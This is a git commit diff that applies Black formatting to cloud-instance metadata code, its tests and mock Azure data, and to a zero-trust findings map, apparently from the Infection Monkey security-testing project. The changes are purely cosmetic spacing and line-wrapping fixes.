Fixed screwed-up formatting with black

VakarisZ 2021-04-07 11:13:49 +03:00 committed by Mike Salvatore
parent 03bcfc97af
commit 3149dcc8ec
329 changed files with 5482 additions and 5603 deletions
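
Most of the diff below is mechanical Black output: a space is added after each key's colon in dict literals, argument lists are collapsed back onto a single line when they fit within the line-length limit, and slices with non-trivial bounds get spaces around the colon. A minimal sketch of reproducing the effect through Black's Python API (black.format_str and black.FileMode are the documented entry points; the line length of 100 is an assumption inferred from how the reformatted lines wrap, since the project's Black configuration is not shown in this diff):

    import black

    # One of the patterns Black rewrites throughout this commit.
    source = 'creds = {"username":user, "password":password, "lm_hash":lm_hash}\n'

    # line_length=100 is assumed; check the repository's pyproject.toml/setup.cfg for the real value.
    formatted = black.format_str(source, mode=black.FileMode(line_length=100))
    print(formatted)  # creds = {"username": user, "password": password, "lm_hash": lm_hash}

Running the same formatter over the whole tree (black . from the repository root) would produce file-wide churn like the 329 files touched here.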


@ -48,8 +48,7 @@ class AwsInstance(CloudInstance):
try:
self.account_id = self._extract_account_id(
requests.get(
AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document",
timeout=2
AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document", timeout=2
).text
)
except (requests.RequestException, json.decoder.JSONDecodeError, IOError) as e:


@ -20,10 +20,10 @@ logger = logging.getLogger(__name__)
def filter_instance_data_from_aws_response(response):
return [
{
"instance_id":x[INSTANCE_ID_KEY],
"name":x[COMPUTER_NAME_KEY],
"os":x[PLATFORM_TYPE_KEY].lower(),
"ip_address":x[IP_ADDRESS_KEY],
"instance_id": x[INSTANCE_ID_KEY],
"name": x[COMPUTER_NAME_KEY],
"os": x[PLATFORM_TYPE_KEY].lower(),
"ip_address": x[IP_ADDRESS_KEY],
}
for x in response[INSTANCE_INFORMATION_LIST_KEY]
]


@ -38,8 +38,8 @@ EXPECTED_ACCOUNT_ID = "123456789012"
def get_test_aws_instance(
text={"instance_id":None, "region":None, "account_id":None},
exception={"instance_id":None, "region":None, "account_id":None},
text={"instance_id": None, "region": None, "account_id": None},
exception={"instance_id": None, "region": None, "account_id": None},
):
with requests_mock.Mocker() as m:
# request made to get instance_id
@ -67,9 +67,9 @@ def get_test_aws_instance(
def good_data_mock_instance():
return get_test_aws_instance(
text={
"instance_id":INSTANCE_ID_RESPONSE,
"region":AVAILABILITY_ZONE_RESPONSE,
"account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
"instance_id": INSTANCE_ID_RESPONSE,
"region": AVAILABILITY_ZONE_RESPONSE,
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
}
)
@ -99,9 +99,9 @@ def test_get_account_id_good_data(good_data_mock_instance):
def bad_region_data_mock_instance():
return get_test_aws_instance(
text={
"instance_id":INSTANCE_ID_RESPONSE,
"region":"in-a-different-world",
"account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
"instance_id": INSTANCE_ID_RESPONSE,
"region": "in-a-different-world",
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
}
)
@ -131,9 +131,9 @@ def test_get_account_id_bad_region_data(bad_region_data_mock_instance):
def bad_account_id_data_mock_instance():
return get_test_aws_instance(
text={
"instance_id":INSTANCE_ID_RESPONSE,
"region":AVAILABILITY_ZONE_RESPONSE,
"account_id":"who-am-i",
"instance_id": INSTANCE_ID_RESPONSE,
"region": AVAILABILITY_ZONE_RESPONSE,
"account_id": "who-am-i",
}
)
@ -163,11 +163,11 @@ def test_get_account_id_data_bad_account_id_data(bad_account_id_data_mock_instan
def bad_instance_id_request_mock_instance(instance_id_exception):
return get_test_aws_instance(
text={
"instance_id":None,
"region":AVAILABILITY_ZONE_RESPONSE,
"account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
"instance_id": None,
"region": AVAILABILITY_ZONE_RESPONSE,
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
},
exception={"instance_id":instance_id_exception, "region":None, "account_id":None},
exception={"instance_id": instance_id_exception, "region": None, "account_id": None},
)
@ -201,11 +201,11 @@ def test_get_account_id_bad_instance_id_request(bad_instance_id_request_mock_ins
def bad_region_request_mock_instance(region_exception):
return get_test_aws_instance(
text={
"instance_id":INSTANCE_ID_RESPONSE,
"region":None,
"account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
"instance_id": INSTANCE_ID_RESPONSE,
"region": None,
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
},
exception={"instance_id":None, "region":region_exception, "account_id":None},
exception={"instance_id": None, "region": region_exception, "account_id": None},
)
@ -239,11 +239,11 @@ def test_get_account_id_bad_region_request(bad_region_request_mock_instance):
def bad_account_id_request_mock_instance(account_id_exception):
return get_test_aws_instance(
text={
"instance_id":INSTANCE_ID_RESPONSE,
"region":AVAILABILITY_ZONE_RESPONSE,
"account_id":None,
"instance_id": INSTANCE_ID_RESPONSE,
"region": AVAILABILITY_ZONE_RESPONSE,
"account_id": None,
},
exception={"instance_id":None, "region":None, "account_id":account_id_exception},
exception={"instance_id": None, "region": None, "account_id": account_id_exception},
)


@ -54,5 +54,5 @@ class TestFilterInstanceDataFromAwsResponse(TestCase):
)
self.assertEqual(
filter_instance_data_from_aws_response(json.loads(json_response_full)),
[{"instance_id":"string", "ip_address":"string", "name":"string", "os":"string"}],
[{"instance_id": "string", "ip_address": "string", "name": "string", "os": "string"}],
)


@ -9,8 +9,7 @@ from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT
LATEST_AZURE_METADATA_API_VERSION = "2019-04-30"
AZURE_METADATA_SERVICE_URL = (
"http://169.254.169.254/metadata/instance?api-version=%s" %
LATEST_AZURE_METADATA_API_VERSION
"http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION
)
logger = logging.getLogger(__name__)
@ -41,7 +40,7 @@ class AzureInstance(CloudInstance):
try:
response = requests.get(
AZURE_METADATA_SERVICE_URL,
headers={"Metadata":"true"},
headers={"Metadata": "true"},
timeout=SHORT_REQUEST_TIMEOUT,
)


@ -7,96 +7,96 @@ from common.cloud.azure.azure_instance import AZURE_METADATA_SERVICE_URL, AzureI
from common.cloud.environment_names import Environment
GOOD_DATA = {
"compute":{
"azEnvironment":"AZUREPUBLICCLOUD",
"isHostCompatibilityLayerVm":"true",
"licenseType":"Windows_Client",
"location":"westus",
"name":"examplevmname",
"offer":"Windows",
"osProfile":{
"adminUsername":"admin",
"computerName":"examplevmname",
"disablePasswordAuthentication":"true",
"compute": {
"azEnvironment": "AZUREPUBLICCLOUD",
"isHostCompatibilityLayerVm": "true",
"licenseType": "Windows_Client",
"location": "westus",
"name": "examplevmname",
"offer": "Windows",
"osProfile": {
"adminUsername": "admin",
"computerName": "examplevmname",
"disablePasswordAuthentication": "true",
},
"osType":"linux",
"placementGroupId":"f67c14ab-e92c-408c-ae2d-da15866ec79a",
"plan":{"name":"planName", "product":"planProduct", "publisher":"planPublisher"},
"platformFaultDomain":"36",
"platformUpdateDomain":"42",
"publicKeys":[
{"keyData":"ssh-rsa 0", "path":"/home/user/.ssh/authorized_keys0"},
{"keyData":"ssh-rsa 1", "path":"/home/user/.ssh/authorized_keys1"},
"osType": "linux",
"placementGroupId": "f67c14ab-e92c-408c-ae2d-da15866ec79a",
"plan": {"name": "planName", "product": "planProduct", "publisher": "planPublisher"},
"platformFaultDomain": "36",
"platformUpdateDomain": "42",
"publicKeys": [
{"keyData": "ssh-rsa 0", "path": "/home/user/.ssh/authorized_keys0"},
{"keyData": "ssh-rsa 1", "path": "/home/user/.ssh/authorized_keys1"},
],
"publisher":"RDFE-Test-Microsoft-Windows-Server-Group",
"resourceGroupName":"macikgo-test-may-23",
"resourceId":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test"
"publisher": "RDFE-Test-Microsoft-Windows-Server-Group",
"resourceGroupName": "macikgo-test-may-23",
"resourceId": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test"
"-may-23/"
"providers/Microsoft.Compute/virtualMachines/examplevmname",
"securityProfile":{"secureBootEnabled":"true", "virtualTpmEnabled":"false"},
"sku":"Windows-Server-2012-R2-Datacenter",
"storageProfile":{
"dataDisks":[
"securityProfile": {"secureBootEnabled": "true", "virtualTpmEnabled": "false"},
"sku": "Windows-Server-2012-R2-Datacenter",
"storageProfile": {
"dataDisks": [
{
"caching":"None",
"createOption":"Empty",
"diskSizeGB":"1024",
"image":{"uri":""},
"lun":"0",
"managedDisk":{
"id":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
"caching": "None",
"createOption": "Empty",
"diskSizeGB": "1024",
"image": {"uri": ""},
"lun": "0",
"managedDisk": {
"id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
"resourceGroups/macikgo-test-may-23/providers/"
"Microsoft.Compute/disks/exampledatadiskname",
"storageAccountType":"Standard_LRS",
"storageAccountType": "Standard_LRS",
},
"name":"exampledatadiskname",
"vhd":{"uri":""},
"writeAcceleratorEnabled":"false",
"name": "exampledatadiskname",
"vhd": {"uri": ""},
"writeAcceleratorEnabled": "false",
}
],
"imageReference":{
"id":"",
"offer":"UbuntuServer",
"publisher":"Canonical",
"sku":"16.04.0-LTS",
"version":"latest",
"imageReference": {
"id": "",
"offer": "UbuntuServer",
"publisher": "Canonical",
"sku": "16.04.0-LTS",
"version": "latest",
},
"osDisk":{
"caching":"ReadWrite",
"createOption":"FromImage",
"diskSizeGB":"30",
"diffDiskSettings":{"option":"Local"},
"encryptionSettings":{"enabled":"false"},
"image":{"uri":""},
"managedDisk":{
"id":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
"osDisk": {
"caching": "ReadWrite",
"createOption": "FromImage",
"diskSizeGB": "30",
"diffDiskSettings": {"option": "Local"},
"encryptionSettings": {"enabled": "false"},
"image": {"uri": ""},
"managedDisk": {
"id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
"resourceGroups/macikgo-test-may-23/providers/"
"Microsoft.Compute/disks/exampleosdiskname",
"storageAccountType":"Standard_LRS",
"storageAccountType": "Standard_LRS",
},
"name":"exampleosdiskname",
"osType":"Linux",
"vhd":{"uri":""},
"writeAcceleratorEnabled":"false",
"name": "exampleosdiskname",
"osType": "Linux",
"vhd": {"uri": ""},
"writeAcceleratorEnabled": "false",
},
},
"subscriptionId":"xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx",
"tags":"baz:bash;foo:bar",
"version":"15.05.22",
"vmId":"02aab8a4-74ef-476e-8182-f6d2ba4166a6",
"vmScaleSetName":"crpteste9vflji9",
"vmSize":"Standard_A3",
"zone":"",
"subscriptionId": "xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx",
"tags": "baz:bash;foo:bar",
"version": "15.05.22",
"vmId": "02aab8a4-74ef-476e-8182-f6d2ba4166a6",
"vmScaleSetName": "crpteste9vflji9",
"vmSize": "Standard_A3",
"zone": "",
},
"network":{
"interface":[
"network": {
"interface": [
{
"ipv4":{
"ipAddress":[{"privateIpAddress":"10.144.133.132", "publicIpAddress":""}],
"subnet":[{"address":"10.144.133.128", "prefix":"26"}],
"ipv4": {
"ipAddress": [{"privateIpAddress": "10.144.133.132", "publicIpAddress": ""}],
"subnet": [{"address": "10.144.133.128", "prefix": "26"}],
},
"ipv6":{"ipAddress":[]},
"macAddress":"0011AAFFBB22",
"ipv6": {"ipAddress": []},
"macAddress": "0011AAFFBB22",
}
]
},
@ -113,7 +113,7 @@ javascript\">\nvar pageName = '/';\ntop.location.replace(pageName);\n</script>\n
"</body>\n</html>\n"
)
BAD_DATA_JSON = {"":""}
BAD_DATA_JSON = {"": ""}
def get_test_azure_instance(url, **kwargs):


@ -39,7 +39,7 @@ class AwsCmdRunner(CmdRunner):
doc_name = "AWS-RunShellScript" if self.is_linux else "AWS-RunPowerShellScript"
command_res = self.ssm.send_command(
DocumentName=doc_name,
Parameters={"commands":[command_line]},
Parameters={"commands": [command_line]},
InstanceIds=[self.instance_id],
)
return command_res["Command"]["CommandId"]


@ -81,24 +81,24 @@ PRINCIPLE_DISASTER_RECOVERY = "data_backup"
PRINCIPLE_SECURE_AUTHENTICATION = "secure_authentication"
PRINCIPLE_MONITORING_AND_LOGGING = "monitoring_and_logging"
PRINCIPLES = {
PRINCIPLE_SEGMENTATION:"Apply segmentation and micro-segmentation inside your "
PRINCIPLE_SEGMENTATION: "Apply segmentation and micro-segmentation inside your "
""
""
"network.",
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC:"Analyze network traffic for malicious activity.",
PRINCIPLE_USER_BEHAVIOUR:"Adopt security user behavior analytics.",
PRINCIPLE_ENDPOINT_SECURITY:"Use anti-virus and other traditional endpoint "
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC: "Analyze network traffic for malicious activity.",
PRINCIPLE_USER_BEHAVIOUR: "Adopt security user behavior analytics.",
PRINCIPLE_ENDPOINT_SECURITY: "Use anti-virus and other traditional endpoint "
"security solutions.",
PRINCIPLE_DATA_CONFIDENTIALITY:"Ensure data's confidentiality by encrypting it.",
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES:"Configure network policies to be as restrictive as "
PRINCIPLE_DATA_CONFIDENTIALITY: "Ensure data's confidentiality by encrypting it.",
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as "
"possible.",
PRINCIPLE_USERS_MAC_POLICIES:"Users' permissions to the network and to resources "
PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources "
"should be MAC (Mandatory "
"Access Control) only.",
PRINCIPLE_DISASTER_RECOVERY:"Ensure data and infrastructure backups for disaster "
PRINCIPLE_DISASTER_RECOVERY: "Ensure data and infrastructure backups for disaster "
"recovery scenarios.",
PRINCIPLE_SECURE_AUTHENTICATION:"Ensure secure authentication process's.",
PRINCIPLE_MONITORING_AND_LOGGING:"Ensure monitoring and logging in network resources.",
PRINCIPLE_SECURE_AUTHENTICATION: "Ensure secure authentication process's.",
PRINCIPLE_MONITORING_AND_LOGGING: "Ensure monitoring and logging in network resources.",
}
POSSIBLE_STATUSES_KEY = "possible_statuses"
@ -107,206 +107,206 @@ PRINCIPLE_KEY = "principle_key"
FINDING_EXPLANATION_BY_STATUS_KEY = "finding_explanation"
TEST_EXPLANATION_KEY = "explanation"
TESTS_MAP = {
TEST_SEGMENTATION:{
TEST_EXPLANATION_KEY:"The Monkey tried to scan and find machines that it can "
TEST_SEGMENTATION: {
TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can "
"communicate with from the machine it's "
"running on, that belong to different network segments.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey performed cross-segment communication. Check firewall rules and"
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and"
" logs.",
STATUS_PASSED:"Monkey couldn't perform cross-segment communication. If relevant, "
STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, "
"check firewall logs.",
},
PRINCIPLE_KEY:PRINCIPLE_SEGMENTATION,
PILLARS_KEY:[NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED],
PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION,
PILLARS_KEY: [NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED],
},
TEST_MALICIOUS_ACTIVITY_TIMELINE:{
TEST_EXPLANATION_KEY:"The Monkeys in the network performed malicious-looking "
TEST_MALICIOUS_ACTIVITY_TIMELINE: {
TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking "
"actions, like scanning and attempting "
"exploitation.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_VERIFY:"Monkey performed malicious actions in the network. Check SOC logs and "
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and "
"alerts."
},
PRINCIPLE_KEY:PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
PILLARS_KEY:[NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_VERIFY],
PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
},
TEST_ENDPOINT_SECURITY_EXISTS:{
TEST_EXPLANATION_KEY:"The Monkey checked if there is an active process of an "
TEST_ENDPOINT_SECURITY_EXISTS: {
TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an "
"endpoint security software.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey didn't find ANY active endpoint security processes. Install and "
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and "
"activate anti-virus "
"software on endpoints.",
STATUS_PASSED:"Monkey found active endpoint security processes. Check their logs to "
STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to "
"see if Monkey was a "
"security concern. ",
},
PRINCIPLE_KEY:PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY:[DEVICES],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY: [DEVICES],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_MACHINE_EXPLOITED:{
TEST_EXPLANATION_KEY:"The Monkey tries to exploit machines in order to "
TEST_MACHINE_EXPLOITED: {
TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to "
"breach them and propagate in the network.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey successfully exploited endpoints. Check IDS/IPS logs to see "
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see "
"activity recognized and see "
"which endpoints were compromised.",
STATUS_PASSED:"Monkey didn't manage to exploit an endpoint.",
STATUS_PASSED: "Monkey didn't manage to exploit an endpoint.",
},
PRINCIPLE_KEY:PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY:[DEVICES],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY],
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY: [DEVICES],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY],
},
TEST_SCHEDULED_EXECUTION:{
TEST_EXPLANATION_KEY:"The Monkey was executed in a scheduled manner.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_VERIFY:"Monkey was executed in a scheduled manner. Locate this activity in "
TEST_SCHEDULED_EXECUTION: {
TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in "
"User-Behavior security "
"software.",
STATUS_PASSED:"Monkey failed to execute in a scheduled manner.",
STATUS_PASSED: "Monkey failed to execute in a scheduled manner.",
},
PRINCIPLE_KEY:PRINCIPLE_USER_BEHAVIOUR,
PILLARS_KEY:[PEOPLE, NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_VERIFY],
PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
PILLARS_KEY: [PEOPLE, NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
},
TEST_DATA_ENDPOINT_ELASTIC:{
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to "
TEST_DATA_ENDPOINT_ELASTIC: {
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to "
"ElasticSearch instances.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey accessed ElasticSearch instances. Limit access to data by "
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by "
"encrypting it in in-transit.",
STATUS_PASSED:"Monkey didn't find open ElasticSearch instances. If you have such "
STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such "
"instances, look for alerts "
"that indicate attempts to access them. ",
},
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY:[DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_DATA_ENDPOINT_HTTP:{
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to HTTP " "servers.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey accessed HTTP servers. Limit access to data by encrypting it in"
TEST_DATA_ENDPOINT_HTTP: {
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP " "servers.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in"
" in-transit.",
STATUS_PASSED:"Monkey didn't find open HTTP servers. If you have such servers, "
STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, "
"look for alerts that indicate "
"attempts to access them. ",
},
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY:[DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_DATA_ENDPOINT_POSTGRESQL:{
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to " "PostgreSQL servers.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey accessed PostgreSQL servers. Limit access to data by encrypting"
TEST_DATA_ENDPOINT_POSTGRESQL: {
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to " "PostgreSQL servers.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed PostgreSQL servers. Limit access to data by encrypting"
" it in in-transit.",
STATUS_PASSED:"Monkey didn't find open PostgreSQL servers. If you have such servers, "
STATUS_PASSED: "Monkey didn't find open PostgreSQL servers. If you have such servers, "
"look for alerts that "
"indicate attempts to access them. ",
},
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY:[DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_TUNNELING:{
TEST_EXPLANATION_KEY:"The Monkey tried to tunnel traffic using other monkeys.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey tunneled its traffic using other monkeys. Your network policies "
TEST_TUNNELING: {
TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies "
"are too permissive - "
"restrict them. "
},
PRINCIPLE_KEY:PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY:[NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED],
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED],
},
TEST_COMMUNICATE_AS_NEW_USER:{
TEST_EXPLANATION_KEY:"The Monkey tried to create a new user and communicate "
TEST_COMMUNICATE_AS_NEW_USER: {
TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate "
"with the internet from it.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey caused a new user to access the network. Your network policies "
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies "
"are too permissive - "
"restrict them to MAC only.",
STATUS_PASSED:"Monkey wasn't able to cause a new user to access the network.",
STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network.",
},
PRINCIPLE_KEY:PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY:[PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES:{
TEST_EXPLANATION_KEY:"ScoutSuite assessed cloud firewall rules and settings.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found overly permissive firewall rules.",
STATUS_PASSED:"ScoutSuite found no problems with cloud firewall rules.",
TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES: {
TEST_EXPLANATION_KEY: "ScoutSuite assessed cloud firewall rules and settings.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found overly permissive firewall rules.",
STATUS_PASSED: "ScoutSuite found no problems with cloud firewall rules.",
},
PRINCIPLE_KEY:PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY:[NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY: [NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_UNENCRYPTED_DATA:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for resources containing " "unencrypted data.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found resources with unencrypted data.",
STATUS_PASSED:"ScoutSuite found no resources with unencrypted data.",
TEST_SCOUTSUITE_UNENCRYPTED_DATA: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for resources containing " "unencrypted data.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found resources with unencrypted data.",
STATUS_PASSED: "ScoutSuite found no resources with unencrypted data.",
},
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY:[DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_DATA_LOSS_PREVENTION:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for resources which are not "
TEST_SCOUTSUITE_DATA_LOSS_PREVENTION: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for resources which are not "
"protected against data loss.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found resources not protected against data loss.",
STATUS_PASSED:"ScoutSuite found that all resources are secured against data loss.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found resources not protected against data loss.",
STATUS_PASSED: "ScoutSuite found that all resources are secured against data loss.",
},
PRINCIPLE_KEY:PRINCIPLE_DISASTER_RECOVERY,
PILLARS_KEY:[DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_DISASTER_RECOVERY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_SECURE_AUTHENTICATION:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for issues related to users' " "authentication.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found issues related to users' authentication.",
STATUS_PASSED:"ScoutSuite found no issues related to users' authentication.",
TEST_SCOUTSUITE_SECURE_AUTHENTICATION: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for issues related to users' " "authentication.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found issues related to users' authentication.",
